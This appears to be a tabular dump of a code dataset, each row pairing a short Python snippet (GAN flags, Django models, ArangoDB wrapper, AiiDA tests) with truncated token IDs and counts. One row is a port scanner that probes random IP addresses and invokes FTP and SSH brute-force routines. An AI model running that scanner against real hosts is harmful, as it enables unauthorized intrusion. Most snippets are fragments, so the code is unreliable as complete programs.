content stringlengths 1 1.04M | input_ids listlengths 1 774k | ratio_char_token float64 0.38 22.9 | token_count int64 1 774k |
|---|---|---|---|
from pymote.algorithms.shazad2015.floodingupdate import FloodingUpdate
from numpy import concatenate, array, sqrt, dot
class DVHop(FloodingUpdate):
"""
Data is {landmark: [x,y,hop_count], ...}
"""
required_params = ('truePositionKey', 'hopsizeKey')
MAX_HOP = 8
| [
6738,
279,
4948,
1258,
13,
282,
7727,
907,
13,
1477,
1031,
324,
4626,
13,
2704,
702,
278,
19119,
1330,
25588,
278,
10260,
198,
6738,
299,
32152,
1330,
1673,
36686,
378,
11,
7177,
11,
19862,
17034,
11,
16605,
628,
198,
4871,
29854,
234... | 2.638889 | 108 |
import tensorflow as tf
from tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets
import scipy.misc
import numpy as np
import glob
import os
import json
from datetime import datetime, date, time
import cv2
import sys
import getopt
import random
############################################################
#
# reference:
# * https://github.com/openai/InfoGAN.git
# * infogan related logic
# * https://github.com/Newmu/dcgan_code.git
# * https://github.com/soumith/dcgan.torch.git
# * Generator Architecture for DCGAN
# * https://github.com/shekkizh/EBGAN.tensorflow.git
# * pull-away regularization term
# * optimizer setup correspoding variable scope
############################################################
FLAGS = tf.flags.FLAGS
tf.flags.DEFINE_integer("channel", "1", "batch size for training")
tf.flags.DEFINE_integer("max_epoch", "100", "maximum iterations for training")
tf.flags.DEFINE_integer("batch_size", "128", "batch size for training")
tf.flags.DEFINE_integer("z_dim", "62", "size of input vector to generator")
tf.flags.DEFINE_integer("cd_dim", "10", "size of discrete code")
tf.flags.DEFINE_integer("cc_dim", "2", "size of continuous code")
tf.flags.DEFINE_float("lambda0", "1.00", "lambda for Regularization Term")
tf.flags.DEFINE_float("learning_rate_D", "2e-4", "Learning rate for Adam Optimizer")
#tf.flags.DEFINE_float("learning_rate_G", "1e-3", "Learning rate for Adam Optimizer")
tf.flags.DEFINE_float("learning_rate_G", "2e-4", "Learning rate for Adam Optimizer")
tf.flags.DEFINE_float("eps", "1e-5", "epsilon for various operation")
tf.flags.DEFINE_float("beta1", "0.5", "beta1 for Adam optimizer")
tf.flags.DEFINE_float("pt_w", "0.1", "weight of pull-away term")
tf.flags.DEFINE_float("margin", "20", "Margin to converge to for discriminator")
tf.flags.DEFINE_string("noise_type", "uniform", "noise type for z vectors")
tf.flags.DEFINE_string("save_dir", "info_mnist_checkpoints", "dir for checkpoints")
tf.flags.DEFINE_integer("img_size", "28", "sample image size")
tf.flags.DEFINE_integer("d_ch_size", "64", "channel size in last discriminator layer")
tf.flags.DEFINE_integer("g_ch_size", "128", "channel size in last generator layer")
tf.flags.DEFINE_integer("num_threads", "6", "max thread number")
if __name__ == "__main__":
tf.app.run()
| [
11748,
11192,
273,
11125,
355,
48700,
198,
6738,
11192,
273,
11125,
13,
3642,
822,
13,
35720,
13,
29412,
13,
35720,
13,
19608,
292,
1039,
13,
10295,
396,
1330,
1100,
62,
7890,
62,
28709,
198,
11748,
629,
541,
88,
13,
44374,
198,
11748... | 3.005188 | 771 |
# import all necessary packages
from inspect import signature
import numpy as np
from genericdiff.generic_diff import *
from genericdiff.elemental_functions import *
class JacobianProduct:
"""
Takes in a function vector and allows user to calculate partials or the full jacobian product based on
values specified by the user
This class will only take a vector of functions that have the SAME number of inputs that are in the
SAME order. If the functions do not pass this check during class construction, InvalidFunctionsError is
raised.
The input should look like the following:
f = lambda x, y: cos(x) + sin(y)
h = lambda x, y: x + y
function_vector = [f, h]
jp_object = JacobianProduct(function_vector)
The class has various methods:
-partial_ders()
This method can calculate a partial for one function in the object or for all functions.
The variable value inputs are specified in inputs. For example:
inputs = [[1, 2, 3], 0] # x = 1, 2, 3 and y = 0
# this evaluates the partial at all values of x holding y constant
# returns a list of partial derivative evals for each function
# wrt sets the variable to calculate the partial
list_of_partials = jp_object.partial_ders(wrt=0, inputs=inputs)
[[2.4, 3.5, 2.5], [1, 2, 3]]
-jacobian_product()
This method calculates the jacobian product it either:
takes in one value for each variable or multiple values for each input BUT the number of values
for each variable must be the same. Calculates a separate jacobian for each element in the input vectors.
inputs = [[1, 2, 3], [1, 2, 3]] # calculates 3 jacobian products: (1, 1), (2, 2), and (3, 3)
list_of_jp_matrices = jp_object.jacobian_product(inputs=inputs)
[ [[df/dx, df/dy],
[dh/dx, dh/dy]],
for (2,2),
for (3,3)]
"""
| [
2,
1330,
477,
3306,
10392,
201,
198,
6738,
10104,
1330,
9877,
201,
198,
11748,
299,
32152,
355,
45941,
201,
198,
6738,
14276,
26069,
13,
41357,
62,
26069,
1330,
1635,
201,
198,
6738,
14276,
26069,
13,
30854,
282,
62,
12543,
2733,
1330,
... | 2.663539 | 746 |
from compilation.errors import IncorrectCallError
from compilation.tokens import Token
| [
6738,
23340,
13,
48277,
1330,
3457,
47315,
14134,
12331,
198,
6738,
23340,
13,
83,
482,
641,
1330,
29130,
628
] | 4.631579 | 19 |
from unittest import TestCase
from wild_timer import ResettableTimer
import time
| [
6738,
555,
715,
395,
1330,
6208,
20448,
198,
6738,
4295,
62,
45016,
1330,
1874,
3087,
540,
48801,
198,
11748,
640,
628
] | 3.904762 | 21 |
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""Basic tests for all migratios"""
import pytest
@pytest.mark.usefixtures('perform_migrations')
def test_all_empty_migrations():
"""Test migrating down to a particular version, then back up, using an empty database.
Note, migrating down+up with 59edaf8a8b79_adding_indexes_and_constraints_to_the_.py raises::
sqlalchemy.exc.ProgrammingError:
(psycopg2.errors.DuplicateTable) relation "db_dbgroup_dbnodes_dbgroup_id_dbnode_id_key" already exists
So we only run for all versions later than this.
"""
from aiida.backends.sqlalchemy.manager import SqlaBackendManager
migrator = SqlaBackendManager()
all_versions = migrator.list_schema_versions()
first_index = all_versions.index('a514d673c163') + 1
# ideally we would pytest parametrize this, but then we would need to call list_schema_versions on module load
for version in all_versions[first_index:]:
migrator.migrate_down(version)
assert migrator.get_schema_version_backend() == version
migrator.migrate_up('head')
assert migrator.get_schema_version_backend() == migrator.get_schema_version_head()
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
29113,
29113,
7804,
21017,
198,
2,
15069,
357,
66,
828,
383,
317,
4178,
5631,
1074,
13,
1439,
2489,
10395,
13,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
... | 2.626667 | 675 |
from ..Models import (
Sensor,
MonitoredSite,
Base,
Equipment
# SensorList
)
from sqlalchemy import select, desc, join, outerjoin, and_, not_, or_, exists, Table
from sqlalchemy.orm import aliased, exc
from collections import OrderedDict
from sqlalchemy.exc import IntegrityError
from ..controllers.security import RootCore, context_permissions
from . import DynamicObjectView, DynamicObjectCollectionView, DynamicObjectValue, DynamicObjectValues
from ..GenericObjets.SearchEngine import Query_engine
from ..utils.datetime import parse
SensorDynPropValue = Sensor.DynamicValuesClass
@Query_engine(Sensor)
@Query_engine.add_filter(SensorList, 'toto')
@Query_engine.add_filter(SensorList, 'availableOn')
RootCore.listChildren.append(('sensors', SensorsView))
| [
6738,
11485,
5841,
1424,
1330,
357,
198,
220,
220,
220,
35367,
11,
198,
220,
220,
220,
2892,
20026,
29123,
11,
198,
220,
220,
220,
7308,
11,
198,
220,
220,
220,
22412,
198,
220,
220,
220,
1303,
35367,
8053,
198,
8,
198,
6738,
44161,... | 3.367521 | 234 |
# https://leetcode.com/problems/path-sum-iii/submissions/
# https://leetcode.com/problems/path-sum-iii/discuss/141424/Python-step-by-step-walk-through.-Easy-to-understand.-Two-solutions-comparison.-%3A-)
# nice explanation of bruteforce + memoization
# Definition for a binary tree node.
from typing import List
from collections import defaultdict
# 52 ms
# memoization, O(N) time complexity since we visit each node only once
# but sacrifice some space complexity --> now need O(N) extra space
# accepted
# bruteforce, O(N^2) (732 ms)
# bcos O(N) to visit each node via DFS and then another O(N) to check for paths via DFS
| [
2,
3740,
1378,
293,
316,
8189,
13,
785,
14,
1676,
22143,
14,
6978,
12,
16345,
12,
15479,
14,
7266,
8481,
14,
198,
2,
3740,
1378,
293,
316,
8189,
13,
785,
14,
1676,
22143,
14,
6978,
12,
16345,
12,
15479,
14,
15410,
1046,
14,
1415,
... | 2.911504 | 226 |
from first import *
| [
6738,
717,
1330,
1635,
198
] | 4 | 5 |
# Generated by Django 2.0.6 on 2018-07-08 23:20
from django.db import migrations, models
| [
2,
2980,
515,
416,
37770,
362,
13,
15,
13,
21,
319,
2864,
12,
2998,
12,
2919,
2242,
25,
1238,
198,
198,
6738,
42625,
14208,
13,
9945,
1330,
15720,
602,
11,
4981,
628
] | 2.84375 | 32 |
from typing import Any, IO, Optional, TYPE_CHECKING
if TYPE_CHECKING:
from .console import Console
# Global console used by alternative print
_console: Optional["Console"] = None
if __name__ == "__main__": # pragma: no cover
print("Hello, **World**")
| [
6738,
19720,
1330,
4377,
11,
24418,
11,
32233,
11,
41876,
62,
50084,
2751,
198,
198,
361,
41876,
62,
50084,
2751,
25,
198,
220,
220,
220,
422,
764,
41947,
1330,
24371,
198,
198,
2,
8060,
8624,
973,
416,
5559,
3601,
198,
62,
41947,
2... | 3.231707 | 82 |
from .api import Zerochan
from utils import sendPhotos, sendDocuments, handleBadRequest, NazurinError
from telegram.ext import CommandHandler
from telegram.error import BadRequest
api = Zerochan()
commands = [
CommandHandler('zerochan', zerochan_view, pass_args=True, run_async=True),
CommandHandler('zerochan_download', zerochan_download, pass_args=True, run_async=True)
] | [
6738,
764,
15042,
1330,
12169,
3147,
198,
6738,
3384,
4487,
1330,
3758,
21197,
11,
3758,
38354,
11,
5412,
22069,
18453,
11,
12819,
333,
259,
12331,
198,
6738,
573,
30536,
13,
2302,
1330,
9455,
25060,
198,
6738,
573,
30536,
13,
18224,
13... | 3.301724 | 116 |
from dataclasses import dataclass, field
from typing import Dict, Any, ClassVar, Set
from exco import setting as st
from exco.dereferator import Dereferator
from exco.exception import ExcoException, ParserSpecCreationException
from exco.extractor_spec.type import SpecParam
@dataclass
| [
6738,
4818,
330,
28958,
1330,
4818,
330,
31172,
11,
2214,
198,
6738,
19720,
1330,
360,
713,
11,
4377,
11,
5016,
19852,
11,
5345,
198,
198,
6738,
409,
1073,
1330,
4634,
355,
336,
198,
6738,
409,
1073,
13,
67,
567,
2232,
1352,
1330,
3... | 3.388235 | 85 |
# Insertion Sort - Give position of the indices, as if array were sorted.
if __name__ == "__main__":
N = int(input())
input_arr = list(map(int, input().split()))
original_arr = input_arr[:] # Replicating the input_arr, to save unsorted array
sorted_arr = insertion_sort(input_arr, N) # Function call
for item in original_arr:
print(sorted_arr.index(item)+1, end = " ")
| [
2,
35835,
295,
33947,
532,
13786,
2292,
286,
262,
36525,
11,
355,
611,
7177,
547,
23243,
13,
198,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
220,
220,
220,
399,
796,
493,
7,
15414,
28955,
198,
220,
220,
220,
... | 2.758621 | 145 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Prints a header file to be used with SELECTIVE_REGISTRATION.
Example usage:
print_selective_registration_header \
--graphs=path/to/graph.pb > ops_to_register.h
Then when compiling tensorflow, include ops_to_register.h in the include
search path and pass -DSELECTIVE_REGISTRATION - see
core/framework/selective_registration.h for more details.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import sys
from tensorflow.python.platform import app
from tensorflow.python.tools import selective_registration_header_lib
FLAGS = None
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.register('type', 'bool', lambda v: v.lower() == 'true')
parser.add_argument(
'--graphs',
type=str,
default='',
help='Comma-separated list of paths to model files to be analyzed.',
required=True)
parser.add_argument(
'--proto_fileformat',
type=str,
default='rawproto',
help='Format of proto file, either textproto or rawproto.')
parser.add_argument(
'--default_ops',
type=str,
default='NoOp:NoOp,_Recv:RecvOp,_Send:SendOp',
help='Default operator:kernel pairs to always include implementation for.'
'Pass "all" to have all operators and kernels included; note that this '
'should be used only when it is useful compared with simply not using '
'selective registration, as it can in some cases limit the effect of '
'compilation caches')
FLAGS, unparsed = parser.parse_known_args()
app.run(main=main, argv=[sys.argv[0]] + unparsed)
| [
2,
15069,
1584,
383,
309,
22854,
37535,
46665,
13,
1439,
6923,
33876,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,
... | 3.199454 | 732 |
import taichi as ti
from .bls_test_template import bls_particle_grid
@ti.require(ti.extension.bls)
@ti.all_archs
@ti.require(ti.extension.bls)
@ti.all_archs
@ti.require(ti.extension.bls)
@ti.all_archs
@ti.require(ti.extension.bls)
@ti.all_archs
@ti.require(ti.extension.bls)
@ti.all_archs
# TODO: debug mode behavior of assume_in_range
| [
11748,
20486,
16590,
355,
46668,
198,
6738,
764,
2436,
82,
62,
9288,
62,
28243,
1330,
698,
82,
62,
3911,
1548,
62,
25928,
628,
198,
31,
20259,
13,
46115,
7,
20259,
13,
2302,
3004,
13,
2436,
82,
8,
198,
31,
20259,
13,
439,
62,
3459... | 2.351351 | 148 |
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tensorboard import test as tb_test
from tensorboard.util import io_util
if __name__ == "__main__":
tb_test.main()
| [
2,
15069,
33448,
383,
309,
22854,
37535,
46665,
13,
1439,
6923,
33876,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,
11846,... | 3.607843 | 204 |
# -*- coding: utf-8 -*-
import pytest
from moha.vm.grammar.v0_2_0 import parse_source
@pytest.mark.parametrize('op', ['==', '!=', '>=', '<=', '>', '<'])
@pytest.mark.parametrize('op', ['<<', '>>'])
@pytest.mark.parametrize('op', ['+', '-'])
@pytest.mark.parametrize('op', ['*', '/', '%'])
@pytest.mark.parametrize('op', ['+', '-', '~'])
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
11748,
12972,
9288,
198,
6738,
285,
28083,
13,
14761,
13,
4546,
3876,
13,
85,
15,
62,
17,
62,
15,
1330,
21136,
62,
10459,
198,
198,
31,
9078,
9288,
13,
4102,
13... | 2.047619 | 168 |
import time
import typing
import hashlib
import collections
import threading
import jk_typing
from ..utils.APIError import APIError
from ._auth_common import _Resp, _checkBytesEqual
from ..usermgr.BackupUser import BackupUser
_AuthAttempt = collections.namedtuple("_AuthAttempt", [
"asid", # authentification session ID;
"t", # time stamp;
"auth", # the authentification method object;
"userName", # the name of the user that tries to authenticate;
"peerFingerprint", # some kind of fingerprint that represents the connecting peer;
"serverData", # server data that is required by the authentification method; this data is NOT sent to the client;
])
#
| [
628,
198,
11748,
640,
198,
11748,
19720,
198,
11748,
12234,
8019,
198,
11748,
17268,
198,
11748,
4704,
278,
198,
198,
11748,
474,
74,
62,
774,
13886,
198,
198,
6738,
11485,
26791,
13,
17614,
12331,
1330,
7824,
12331,
198,
6738,
47540,
1... | 3.046414 | 237 |
#!/usr/bin/env python3
""" Port Scanner v4 """
import time
import datetime
import socket
import random
import threading
import ipaddress
import re
from optparse import OptionParser
import ftp_scanner
import ssh_scanner
import prettyprint as pp
import concurrent.futures
def portscan(host, ports):
""" Scan specified ports """
err = []
out = []
verb = []
warn = []
verb.append("Starting portscan on %s"%host)
for port in ports:
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
banner = s.recv(1024).strip().decode('utf-8')[0:100]
s.close()
out.append("%s:%s OPEN"%(host, port))
verb.append("%s:%s Banner: %s"%(host, port, banner))
if port == 21:
ftp_results = ftp_scanner.FTPBruteForce(host, None, None)
ftp_err, ftp_out, ftp_verb, ftp_warn = ftp_results
if len(ftp_out) > 0:
out.append(ftp_out[0])
if port == 22:
ssh_results = ssh_scanner.SSHBruteForce(host, None, None)
ssh_err, ssh_out, ssh_verb, ssh_warn = ssh_results
if len(ssh_out) > 0:
out.append(ssh_out[0])
except Exception as e:
verb.append("%s:%s CLOSED (%s)"%(host, port, e))
#return (err, out, verb, warn)
return (err, out, verb, warn)
def randomHost():
""" Generates a random IP address """
host=str(random.randint(1,254))
host+="."+str(random.randint(0,255))
host+="."+str(random.randint(0,255))
host+="."+str(random.randint(0,254))
return host
if __name__=="__main__":
main()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
198,
37811,
4347,
20937,
1008,
410,
19,
220,
220,
220,
220,
37227,
220,
220,
220,
220,
220,
220,
220,
220,
628,
198,
11748,
640,
198,
11748,
4818,
8079,
198,
11748,
17802,
198,
1... | 2.01479 | 879 |
from sklearn import neural_network
import learners
| [
6738,
1341,
35720,
1330,
17019,
62,
27349,
198,
198,
11748,
46184,
628
] | 4.416667 | 12 |
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 6 21:42:53 2017
@author: Antoi
"""
import numpy as np
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
201,
198,
37811,
201,
198,
41972,
319,
3300,
4280,
220,
718,
2310,
25,
3682,
25,
4310,
2177,
201,
198,
201,
198,
31,
9800,
25,
3738,
23013,
201,
198,
37811,
201,
198,
11748... | 1.819444 | 72 |
# -*- coding: utf-8 -*-
"""
Tests for the main module.
"""
# Future
from __future__ import absolute_import, division, print_function, \
unicode_literals, with_statement
# Third Party
import nose
from mock import Mock
# First Party
from metaopt.core.optimize.optimize import custom_optimize
if __name__ == '__main__':
nose.runmodule()
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
51,
3558,
329,
262,
1388,
8265,
13,
198,
37811,
198,
198,
2,
10898,
198,
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
11,
7297,
11,
3601,
62,
8818,
11,
... | 2.974359 | 117 |
# -*- coding: utf8 -*-
import requests, json
import random
__all__ = ["Graph"]
class Graph:
""" Info """
""" Management """
def list_graph(self):
""" List all graphs """
r = requests.get(self.url + '/_api/gharial')
return r.json()
def create_graph(self, collection_name, from_list, to_list):
""" Create a graph """
if type(from_list) != list:
from_list = [from_list]
if type(to_list) != list:
to_list = [to_list]
data = {
"name": self.graph_name,
"edgeDefinitions": [
{
"collection": collection_name,
"from": from_list,
"to": to_list
}
]
}
r = requests.post(self.url + '/_api/gharial',
data=json.dumps(data))
return r.json()
def drop_graph(self):
""" Drop a graph """
r = requests.delete(self.url + '/_api/gharial/' + self.graph_name)
return r.json()
def get_graph(self):
""" Get a graph """
r = requests.get(self.url + '/_api/gharial/' + self.graph_name)
return r.json()
def list_vertex_collections(self):
""" List vertex collections """
r = requests.get(self.url + '/_api/gharial/' + self.graph_name + '/vertex')
return r.json()
def add_vertex_collection(self, collection_name):
""" Add vertex collection"""
data = {
"collection": collection_name
}
r = requests.post(self.url + '/_api/gharial/' + self.graph_name + '/vertex',
data=json.dumps(data))
return r.json()
def remove_vertex_collection(self, collection_name):
""" Remove vertex collection """
r = requests.delete(self.url + '/_api/gharial/' + self.graph_name + '/vertex/' + collection_name)
return r.json()
def list_edge_definitions(self):
""" List edge collections """
r = requests.get(self.url + '/_api/gharial/' + self.graph_name + '/edge')
return r.json()
def add_edge_definition(self, collection_name, from_list, to_list):
""" Add edge collection """
if type(from_list) != list:
from_list = [from_list]
if type(to_list) != list:
to_list = [to_list]
data = {
"collection": collection_name,
"from": from_list,
"to": to_list
}
r = requests.post(self.url + '/_api/gharial/' + self.graph_name + '/edge',
data=json.dumps(data))
return r.json()
def replace_edge_definition(self, collection_name, from_list, to_list):
""" Replace edge definition """
if type(from_list) != list:
from_list = list(from_list)
if type(to_list) != list:
to_list = list(to_list)
data = {
"collection": collection_name,
"from": from_list,
"to": to_list
}
r = requests.post(self.url + '/_api/gharial/' + self.graph_name + '/edge' + collection_name,
data=json.dumps(data))
return r.json()
def remove_edge_definition(self, collection_name):
""" Remove edge definition """
r = requests.delete(self.url + '/_api/gharial/' + self.graph_name + '/edge/' + collection_name)
return r.json()
""" Vertices """
def create_vertex(self, collection_name, data):
""" Create a vertex """
r = requests.post(self.url + '/_api/gharial/' + self.graph_name + '/vertex/' + collection_name,
data=json.dumps(data))
return r.json()
def create_vertex_key(self, collection_name, data):
""" Create a vertex and Get a vertex key"""
r = requests.post(self.url + '/_api/gharial/' + self.graph_name + '/vertex/' + collection_name,
data=json.dumps(data))
return r.json()['vertex']['_key']
def is_vertex(self, collection_name, vertex_key):
""" Check a existence of vertex """
value = self.get_vertex(collection_name, vertex_key)
if value.has_key('code'):
if value['code'] == 200:
return True
else:
return False
else:
return value
def get_vertex(self, collection_name, vertex_key):
""" Get a vertex """
r = requests.get(self.url + '/_api/gharial/' + self.graph_name + '/vertex/' + collection_name + '/' + vertex_key)
return r.json()
def get_vertex_key(self, collection_name, vertex_key):
""" Get a vertex key """
r = requests.get(self.url + '/_api/gharial/' + self.graph_name + '/vertex/' + collection_name + '/' + vertex_key)
return r.json()['vertex']['_key']
def modify_vertex(self, collection_name, vertex_key, data):
""" Modify a vertex """
r = requests.patch(self.url + '/_api/gharial/' + self.graph_name + '/vertex/' + collection_name + '/' + vertex_key,
data=json.dumps(data))
return r.json()
def replace_vertex(self, collection_name, vertex_key, data):
""" Replace a vertex """
r = requests.put(self.url + '/_api/gharial/' + self.graph_name + '/vertex/' + collection_name + '/' + vertex_key,
data=json.dumps(data))
return r.json()
def remove_vertex(self, collection_name, vertex_key):
""" Remove a vertex """
r = requests.delete(self.url + '/_api/gharial/' + self.graph_name + '/vertex/' + collection_name + '/' + vertex_key)
return r.json()
def unicode2key(self, text):
""" Convert unicode to key string
e.g., '한국어' to 'e3a38b24-e999-509d-958f-25f5b717c376'
"""
import uuid
text = unicode(text)
text = ''.join(e for e in text if e.isalnum()) # remove special characters
key = str(uuid.uuid5(uuid.NAMESPACE_DNS, repr(text)))
return key
""" Edges """
def create_edge(self, collection_name, data):
""" Create an edge
Free style json body
data = {
"_key" : "key1",
"_from" : "a/2781783",
"_to" : "b/2781736"
}
"""
r = requests.post(self.url + '/_api/gharial/' + self.graph_name + '/edge/' + collection_name,
data=json.dumps(data))
return r.json()
# if result['code'] == ''
def get_edge(self, collection_name, edge_key):
""" Get a edge """
r = requests.get(self.url + '/_api/gharial/' + self.graph_name + '/edge/' + collection_name + '/' + edge_key)
return r.json()
def modify_edge(self, collection_name, edge_key, data):
""" Modify a edge """
r = requests.patch(self.url + '/_api/gharial/' + self.graph_name + '/edge/' + collection_name + '/' + edge_key,
data=json.dumps(data))
return r.json()
def replace_edge(self, collection_name, edge_key, data):
""" Replace a edge """
r = requests.put(self.url + '/_api/gharial/' + self.graph_name + '/edge/' + collection_name + '/' + edge_key,
data=json.dumps(data))
return r.json()
def remove_edge(self, collection_name, edge_key):
""" Remove a edge """
r = requests.delete(self.url + '/_api/gharial/' + self.graph_name + '/edge/' + collection_name + '/' + edge_key)
return r.json()
""" Traversal """
def traversal(self, startVertex, graph_name=1, direction='any', data=1):
""" Graph traversal """
if graph_name == 1:
graph_name = self.graph_name
if data == 1:
data = {
"startVertex": startVertex,
"graphName": graph_name,
"direction": direction,
}
r = requests.post(self.url + '/_api/traversal/',
data=json.dumps(data))
return r.json()
""" Documents """ | [
2,
532,
9,
12,
19617,
25,
3384,
69,
23,
532,
9,
12,
198,
198,
11748,
7007,
11,
33918,
198,
11748,
4738,
628,
198,
834,
439,
834,
796,
14631,
37065,
8973,
198,
198,
4871,
29681,
25,
628,
220,
220,
220,
37227,
14151,
37227,
628,
198... | 2.114934 | 3,837 |
import jinja2
jinja_env = jinja2.Environment(loader=jinja2.FileSystemLoader('template'))
template = jinja_env.get_template('MATH6303_Warmup_2_1_Part_1.html')
print(template.render()) | [
11748,
474,
259,
6592,
17,
201,
198,
201,
198,
18594,
6592,
62,
24330,
796,
474,
259,
6592,
17,
13,
31441,
7,
29356,
28,
18594,
6592,
17,
13,
8979,
11964,
17401,
10786,
28243,
6,
4008,
201,
198,
28243,
796,
474,
259,
6592,
62,
24330... | 2.454545 | 77 |
"""
problem_2021_05.py
"""
import sys
from typing import List, Any, Generator, Iterator
from dataclasses import dataclass
from enum import IntEnum
from itertools import combinations
import logging
from flood_advent.utils import line_to_parts
from flood_advent.utils import SparseGrid
from flood_advent.utils import init_logging
from flood_advent.utils import LOGGER_NAME
from flood_advent.utils import binary_list_to_int
from flood_advent.utils import parse_args
from flood_advent.utils import Input
logger = logging.getLogger(LOGGER_NAME)
if __name__ == "__main__":
args = parse_args(sys.argv[1:])
init_logging(is_verbose=args.verbose)
logger = logging.getLogger(LOGGER_NAME)
logger.debug("Logger init")
year = 2021
day = 5
if args.year_day:
year = int(args.year_day[:4])
day =int(args.year_day[4:])
problem_input = Input(year=year, day=day, use_test_data=args.use_test_data)
lines = problem_input.get_lines()
#lines = problem_input.get_floats()
#lines = problem_input.get_ints()
# convert from generator to list
lines = list(lines)
logger.info("Loaded %d values", len(lines))
if args.print_data:
for line in lines:
print(line)
sys.exit(0)
##################### Solution
print("Solution:", solve(lines=lines))
print("done.")
# end
| [
37811,
198,
220,
220,
220,
1917,
62,
1238,
2481,
62,
2713,
13,
9078,
198,
37811,
198,
198,
11748,
25064,
198,
6738,
19720,
1330,
7343,
11,
4377,
11,
35986,
11,
40806,
1352,
220,
198,
6738,
4818,
330,
28958,
1330,
4818,
330,
31172,
198... | 2.643545 | 519 |
import boto3
import json
import uuid
from datetime import datetime, timedelta
from dateutil.relativedelta import relativedelta
from boto3.dynamodb.conditions import Key
# Get the service resource.
dynamodb = boto3.resource('dynamodb')
#Get Table Objects
Parent_Table = dynamodb.Table('Parent_Tasks')
Child_Table = dynamodb.Table('Child_Tasks')
Machine_Table = dynamodb.Table('Machines')
#Function for Calculating Due Dates for Children | [
11748,
275,
2069,
18,
198,
11748,
33918,
198,
11748,
334,
27112,
198,
6738,
4818,
8079,
1330,
4818,
8079,
11,
28805,
12514,
198,
6738,
3128,
22602,
13,
2411,
265,
1572,
12514,
1330,
48993,
1572,
12514,
198,
6738,
275,
2069,
18,
13,
67,
... | 3.19708 | 137 |
from tkinter import *
from tkinter import filedialog
from PIL import Image,ImageTk
root = Tk()
root.title("Aula 15")
root.iconbitmap("Terminal.ico")
btn = Button(root, text="Abrir Arquivo", command=open).pack()
root.mainloop() | [
6738,
256,
74,
3849,
1330,
1635,
198,
6738,
256,
74,
3849,
1330,
5717,
498,
519,
198,
6738,
350,
4146,
1330,
7412,
11,
5159,
51,
74,
198,
198,
15763,
796,
309,
74,
3419,
198,
15763,
13,
7839,
7203,
32,
4712,
1315,
4943,
198,
15763,
... | 2.75 | 84 |
from django.db import models
from wagtail_wordpress_importer.models.base_models import \
BaseImportWordpressDataModelMixin
''' Django Models '''
class ImportPost(BaseImportWordpressDataModelMixin):
'''
a model intended for django admin management,
this will be the data source for the wagtail model
using BaseImportWordpressDataModelMixin to keep wordpress data
'''
slug = models.SlugField(blank=True)
status = models.CharField(max_length=255, blank=True)
_type = models.CharField(max_length=255, blank=True)
link = models.URLField(blank=True)
title = models.TextField(blank=True)
content = models.TextField(blank=True)
excerpt = models.TextField(blank=True)
author = models.PositiveIntegerField(default=0)
featured_media = models.PositiveIntegerField(default=0)
comment_status = models.CharField(max_length=255, blank=True)
ping_status = models.CharField(max_length=255, blank=True)
sticky = models.BooleanField(blank=True)
template = models.CharField(max_length=255, blank=True)
_format = models.CharField(max_length=255, blank=True)
categories = models.TextField(blank=True)
tags = models.TextField(blank=True)
custom_fields = models.JSONField(blank=True)
| [
6738,
42625,
14208,
13,
9945,
1330,
4981,
198,
6738,
266,
363,
13199,
62,
40346,
62,
320,
26634,
13,
27530,
13,
8692,
62,
27530,
1330,
3467,
198,
220,
220,
220,
7308,
20939,
26449,
8439,
6601,
17633,
35608,
259,
198,
198,
7061,
6,
377... | 2.923256 | 430 |
from pydantic import BaseModel
| [
6738,
279,
5173,
5109,
1330,
7308,
17633,
628,
198
] | 3.666667 | 9 |
# -*- coding: utf8 -*-
# Copyright (c) 2017-2018 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException
from tencentcloud.common.abstract_client import AbstractClient
